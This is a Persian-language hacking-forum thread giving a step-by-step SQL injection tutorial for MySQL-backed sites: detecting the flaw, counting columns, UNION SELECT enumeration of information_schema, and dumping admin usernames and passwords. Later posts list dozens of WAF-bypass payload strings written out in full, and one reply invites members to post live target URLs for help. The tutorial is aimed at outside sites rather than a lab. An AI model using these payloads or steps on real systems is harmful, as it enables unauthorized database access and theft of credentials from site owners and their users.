رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

root3r

آموزش های قدم به قدم Sql Injection

پست های پیشنهاد شده

با سلام خدمت همه دوستان و عزیزان با توجه به اینکه بخش Database Hacking خالیست و آموزش های مفیدی در آن نیست با مدیران تصمیم گرفتیم پست های غیر مفید را حذف و آموزش های مفید قرار بدیم !

 

باتوجه به عنوان آموزش ها به صورت کوتاه و قدم به قدم است و به اینصورت بهتر میتونیم بهتر Sql Injection درک کنیم !

از

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
جان و دیگر دوستان که در این بخش کمک کردند , متشکرم !

 

قوانین :

1- از اسپم به شدت بپردازید .

2-سوالات خود را در بخش Q/A مطرح کنید .

3- از کپی کردن از سایت های دیگر به شدت خوداری کنید

 

نکته : سعی کنید آموزش ها تا حد امکان ساده باشد و بصورت ویدئویی باشد .


هر گاه كسي سعي كند گونه اي بيانديشد كه : چگونه ميتوانم شغلم از درسم ، درسم از فكرم ، و فكرم با عقيده ام متفاوت باشد . آنگاه او يك نفوذگر است !

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام خدمت دوستان ,

خب در اولین بخش به ساده ترین بخش Sql Injection میپردازیم , که نیاز به هیچگونه bypass و ... ندارد !

تارگت ما :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

 

اولین مرحله : تست اسیب پذیری

در اولین قدم باید چک کنیم سایت اسیب پذیر هست یا خیر. در Sql Injection برای تست وجود اسیب پذیری از تک کوتیشن ( ' ) و یا حرف کد شده ی ( %27 ) استفاده میکنیم که با هم تفاوتی ندارد در حقیقت %27 حرف کد شده ی تک کوتیشن هست ! که اگر دقت کرده باشید در مرورگر هم در صورت تست اسیب پذیری به حرف کد شده تبدیل میشود !

 

تست اسیب پذیری تارگت :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

به این صورت تست اسیب پذیری خواهیم کرد !

 

حال اگر سایت بدون هیچ ارور و هیچگونه تغییراتی کامل Load شود یعنی سایت ما اسیب پذیر نیست .

ولی اگر تارگت ما مثل تارگت بالا با ارور مواجه شود و یا به طور کامل لود نشود و یا ... , سایت مورد نظر در برابر Sql Injection اسیب پذیر است و با استفاده از دستورات و متد های Sql قابل Inject شدن است !

ارور :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

نکته : هر ارور به معنای اینکه سایت در برابر SQL Injection اسیب پذیر است , نیست .

 

 

خب دوستان در بخش بعدی با نحوه پیدا کردن تعداد ستون ها ( Column ) اشنا خواهیم شد وبعد, ویدئویی از این دو بخش خواهیم شد !

موفق باشید .


هر گاه كسي سعي كند گونه اي بيانديشد كه : چگونه ميتوانم شغلم از درسم ، درسم از فكرم ، و فكرم با عقيده ام متفاوت باشد . آنگاه او يك نفوذگر است !

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام خدمت دوستان .

 

دومین مرحله : پیدا کردن ستون ها ( Column ) :

 

برای پیدا کردن تعداد ستون ها از دستور order by استفاده میکنیم , البته دستورات دیگر هم هست که در پست های قبلی اشاره کردیم به ساده ترین بخش Sql Injection میپردازیم , که نیاز به هیچگونه bypass و ... ندارد !

 

تعداد ستون ها , بیشترین عددی (ستون) که بدون خطا لود میشود , است . ابتدا میاییم چند ستون , حدس میزنیم و بعد تست میکنیم !

بطور مثال :

ستون های حدسی ما 15 ...

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

دو حالت دارد :

1- سایت ارروری نمیدهد و کاملا سالم لود میشود

2- سایت اررور میدهد , که در این حالت تعداد ستون هایی که حدس زدیم , کمتر است . اگر بالا دقت کنید , سایت اررور میدهد به این معناست که تعداد ستون های ما کمتر از 15 است .

 

برای یاد گیری بهتر :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

اگر تک تک چک کنید , مشاهده میکنید که تا 11 بدون هیچ اروری و بدون هیچ مشکلی سایت لود میشود , اما در 12 , ما با اررور مواجه میشیم و همانطور که گفتیم تعداد ستون ها , بیشترین عددی که بدون لود ظاهر شود یعنی در اینجا تعداد ستون های 11 تا است .

تعداد ستون های ما :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

نکته : %20 < کد شده ی space است .

نکته : میتونید بجای space از + هم استفاده کنید .

 

 

نمونه :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

نکته : میتونید تعداد ستون ها هم باهم چک کنید .

 

نمونه :

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

[MEDIA=aparat]9UrTb[/MEDIA]

 

برای مشاهده با کفیت بهتر بر روی HD کلیک کنید .

در بخش بعدی نحوه پیدا کردن ستون های اسیب پذیر و نحوه بیرون کشیدن ورژن DB خواهیم پرداخت و بعد هم طبق معمول ویدئو از دو بخش ...

کپی به همراه ذکر منبع بلا مانع است .


هر گاه كسي سعي كند گونه اي بيانديشد كه : چگونه ميتوانم شغلم از درسم ، درسم از فكرم ، و فكرم با عقيده ام متفاوت باشد . آنگاه او يك نفوذگر است !

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام خدمت دوستان , انشالله سلامت باشید ...

 

با اجازه دوستان میریم سراغ مرحله سوم :

 

شناسایی و پیدا کردن ستون های ( Column ) اسیب پذیر :

بعد از بدست اوردن تعداد ستون ها ( Column) برای ادامه کارمون باید ستون های اسیب پذیر هم , بدست اوردیم ... و برای بدست آوردن تعداد ستون های اسیب پذیر از دستور union select استفاده میکنیم و بعد تعداد ستون هارا به ترتیب قرار قرار میدهیم .

به عنوان نمونه :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

فرقی ندارند در واقع علامت > + < Hex شده ی Space است ... .

 

ستون های اسیب پذیر :

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

خب همانطور که میبینید در این تارگت , ستون های 3 , 4 ,5 , 6 اسیب پذیر هستند و میتونید به دلخواه یکی انتخاب کنید و شروع به ادامه Inject کنید ...

 

 

مرحله چهارم :

 

  • نحوه بیرون کشیدن ورژن Database
  • , نحوه بیرون کشیدن نام Database
  • نحوه بیرون کشیدن نام یوزر Database اشنا خواهیم شد .

 

برای بیرون کشیدن ورژن دیتابییس , فقط کافیست version@@ یا ()version بجای یکی از ستون های اسیب پذیر قرار دهیم !

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای نمونه :

 

از ستون 3 استفاده میکنیم :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

و بعد به این شکل ورژن دیتابیس , برای ما نمایش میده !

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

خب , ورژن دیتابیس رو مشاهده کردیم !

اگر ورژن دیتابیس کمتر از 5 باشد برای بدست اوردن نام تیبل های سایت باید از روش حدسی استفاده نماییم که در اینجا ورژن دیتابیس 5 و بالا تر است ... . این هم دلیل این است که چرا به ورژن دیتابیس نیاز داریم ...

 

 

برای بیرون کشیدن نام دیتابیس از ()Database استفاده میکنیم !

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

 

و برای بیرون کشیدن نام یوزر دیتابیس از ()user استفاده میکنیم !

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

نمونه :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

نکته : تمام این ها باید بجای ستون های آسیب پذیر قرار بگیرد ...

در مراحل بعد با نحوه فراخوانی Database برای بیرون کشیدن Table اشنا خواهیم شد ...


هر گاه كسي سعي كند گونه اي بيانديشد كه : چگونه ميتوانم شغلم از درسم ، درسم از فكرم ، و فكرم با عقيده ام متفاوت باشد . آنگاه او يك نفوذگر است !

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام خدمت دوستان .

ویدئو هم از این دو بخش به صورت کامل تهیه شد .

و یک مسئله هم در مورد تست اسیب پذیری , اضافه شد .

تست اسیب پذیری به روش منطقی : این تست توسط یک روش منطقی یا یک شرط انجام میشود , که اگر اخر url و and 1=1 اضافه کنیم سایت کاملا سالم لود خواهد شد ( همه ما میدونیم 1=1 هم هست و باهم برابرند ) ولی اگر and 1=2 قرار دادیم صفحه اگر بالا نیاید ( سفید و بدون محتوا ) یا تغییری کرد احتملا وجود اسیب پذیری Sql Injection است .

 

نمونه :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

سوالی داشتید در بخش Q/A مطرح کنید و برای مشاهده ویدئو با کیفیت بهتر بر روی HD کلیک کنید .

 

[MEDIA=aparat]xk90M[/MEDIA]


هر گاه كسي سعي كند گونه اي بيانديشد كه : چگونه ميتوانم شغلم از درسم ، درسم از فكرم ، و فكرم با عقيده ام متفاوت باشد . آنگاه او يك نفوذگر است !

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

مرحله پنجم : فراخوانی دیتابیس

خب دوستان بعد از مراحل قبل , میرسیم به فراخوانی دیتابیس برای بیرون کشیدن تیبل ادمین :

همونطور که در بالا مشاهده کردید , ورژن دیتابیس و بالای 5 بود , که در Mysql در این ورژن و بالاتر دیتابیسی با نام information_schema اضافه شده است که خود یک باگ بزرگ در Mysql هست ...

نحوه فراخوانی Tables :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

Or

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

 

تیبل های نمایش داده شده :

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

خب , همانطور که مشاهده کردید از (group_concat(table_name استفاده کردیم که اگر از این استفاده نکنیم تیبل ها بصورت تک تک نمایش داده خواهند شد .

 

تیبل ها تارگت ما :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

تیبل های ادمین اغلب به این چنین هستند : tbleuser , admin , login , user , users , username , tbladmin و ...

که با تیبل tbluser باهم چک میکنیم ...

 

 

 

مرحله ششم : بیرون کشیدن column های یک Table یا فراخوانی تیبل ادمین :

برای فراخوانی تیبل ادمین ( هرتیبلی ) از دستور where استفاده میکنیم , برای فراخوانی column های یک تیبل , تیبل مورد نظر رو باید Hex کنید , که میتونید از Hack Bar استفاده کنید که ما تیبل tbleuser رو به Hex تبدیل کردیم که شد 74626c75736572 و برای اینکه به صورت Hex خوانده بشه 0x اضافه میکنیم و بعد هگز مورد نظر در ادامه اضافه میکنیم به این صورت 0x74626c75736572 و در ادامه کار ...

hack bar نصب کنید و مسیر :

Encoding < hex coding <string to 00ff00ff

 

در ادامه کار به اینصورت :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

از دوستانی که همکاری کردند بخصوص ProMis ,

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
تشکر میکنم .

 

در قسمت های بعدی درخدمت شما هستیم .

موفق باشید .


هر گاه كسي سعي كند گونه اي بيانديشد كه : چگونه ميتوانم شغلم از درسم ، درسم از فكرم ، و فكرم با عقيده ام متفاوت باشد . آنگاه او يك نفوذگر است !

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

خب باتشکر از root3r عزیز بابت تاپیک و آموزش های خوبشون.

دوستان یک نکته رو فراموش نکنید که هنگام بیرون کشیدن کالمن ها(ستون ها)ی یک تیبل در قسمت های (group_concat(table_name و information_schema.tables و ()table_schema=database باید به اینها تغییر داده بشن :

(group_concat(column_name و information_schema.columns و table_name=0xhex و منظور از 0xhex ، هگز شده ی نام تیبل هست.

 

مرحله هفتم : بیرون کشیدن اطلاعات از درون تیبل ها و ستون های آنها :

خب ما کالمن ها ( ستون های ) تیبل tblusers روبیرون کشیدیم و همونطور که مشخص هست ستون های مهم txtuser و txtpassword هستند.

وقتی ما میخوایم اطلاعات رو بیرون بکشیم باید تمام دستورات بعد از from رو پاک کنید و به جای اونها نام تیبل رو به صورت هگر نشده قرار دهیم.

همچنین در قسمت (group_concat(column_name باید به جای column_name نام ستون ها(کالمن ها) رو قرار بدیم.توجه کنید که بین نام کالمن ها باید کاما ( , ) قرار بگیره.

پس به اینصورت خواهد شد :

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

به اینصورت :

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

اما همانطور که میبینید اطلاعات یوزرنیم و پسورد به این شکل قابل نمایش هستند و تشخصی ان سخت میشود .

و میاییم از هگز ( : ) برای جدا کردن از هم دیگر استفاده میکنیم که بین اطلاعات هر ستون ( : ) قرار بده

 

هگز مورد نظر: 0x3a

به این صورت :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

به اینصورت:

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

میبینید که خیلی بهتر میتونیم اطلاعات رو ببینیم.

 

تماشای فیلم آموزشی از آپارات :

 

[MEDIA=aparat]yXtoL[/MEDIA]

 

انشالله در تاپیک های بعدی اموزش قدم به قدم Mssql Inject قرار خواهیم داد .


پیامبر اکرم (ص) :

دانش گنجینه‏ هایى است و کلیدهاى آن پرسش است ؛

پس ، خدایتان رحمت کند ، بپرسید ، که با این کار چهار نفر اجر مى‏ یابند :

پرسشگر ، پاسخگو ، شنونده و دوستدار آنان .

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
مرحله پنجم : فراخوانی دیتابیس

 

در ادامه کار به اینصورت :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

موفق باشید .

سلام...خیلی ممنون از تاپیک ارزشمندتون...من این تاپیکو نگاه کردم و یک سوال برام پیش اومد، و اونم اینه که چرا خروجی این کد که شما دادید مثله عکسه نیست و می نویسه :

Forbidden

 

You don't have permission to access /tour.php on this server.

Apache Server at

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
Port 80

 

؟

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

در حملات SQL Injction هر Error یک Bypass مخصوص به خود داره

برای بایپس Forbidden شما باید دستوراتتون رو به این شکل کنید :

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


 

آن که اسب داشت غبارش فرو نشست

امان از گرد سم تازه خر خریده ها

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام ببخشید من بعد از مرحله ی پنجم چیزی رو نمی تونم توی سایت به به دست بیارم نه اسم جدول هارو نه ستون هاشو و نه اطلاعات ستون هارو

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

بعضی اوقات بعضی از waf ها جلوی عملیات اینجکت رو میگیرن و باید با بایپس خاصی پیش برید.

در صورت امکان آدرس تارگتتونو قرار بدید تا بررسی بشه.

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

WAF Bypassing String

/*!%55NiOn*/ /*!%53eLEct*/

 

%55nion(%53elect 1,2,3)-- -

 

+union+distinct+select+

 

+union+distinctROW+select+

 

/**//*!12345UNION SELECT*//**/

 

concat(0x223e,@@version)

 

concat(0x273e27,version(),0x3c212d2d)

 

concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

 

concat(0x223e,@@version,0x3c696d67207372633d22)

 

concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)

 

concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)

 

concat(‘’,@@version,’’)

 

/**//*!50000UNION SELECT*//**/

 

/**/UNION/**//*!50000SELECT*//**/

 

/*!50000UniON SeLeCt*/

 

union /*!50000%53elect*/

 

+#uNiOn+#sEleCt

 

+#1q%0AuNiOn all#qa%0A#%0AsEleCt

 

/*!%55NiOn*/ /*!%53eLEct*/

 

/*!u%6eion*/ /*!se%6cect*/

 

+un/**/ion+se/**/lect

 

uni%0bon+se%0blect

 

%2f**%2funion%2f**%2fselect

 

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

 

REVERSE(noinu)+REVERSE(tceles)

 

/*--*/union/*--*/select/*--*/

 

union (/*!/**/ SeleCT */ 1,2,3)

 

/*!union*/+/*!select*/

 

union+/*!select*/

 

/**/union/**/select/**/

 

/**/uNIon/**/sEleCt/**/

 

/**//*!union*//**//*!select*//**/

 

/*!uNIOn*/ /*!SelECt*/

 

+union+distinct+select+

 

+union+distinctROW+select+

 

+UnIOn%0d%0aSeleCt%0d%0a

 

UNION/*&test=1*/SELECT/*&pwn=2*/

 

un?+un/**/ion+se/**/lect+

 

+UNunionION+SEselectLECT+

 

+uni%0bon+se%0blect+

 

%252f%252a*/union%252f%252a /select%252f%252a*/

 

/%2A%2A/union/%2A%2A/select/%2A%2A/

 

%2f**%2funion%2f**%2fselect%2f**%2f

 

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

 

/*!UnIoN*/SeLecT+

 


خوب باش و خوب زندگی کن

اینستاگرام:

@Mr026.Team

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Union Select by PASS with Url Encoded Method

 

%55nion(%53elect)

union%20distinct%20select

union%20%64istinctRO%57%20select

union%2053elect

%23?%0auion%20?%23?%0aselect

%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect

%55nion %53eLEct

u%6eion se%6cect

unio%6e %73elect

unio%6e%20%64istinc%74%20%73elect

uni%6fn distinct%52OW s%65lect

%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7


خوب باش و خوب زندگی کن

اینستاگرام:

@Mr026.Team

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.


تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...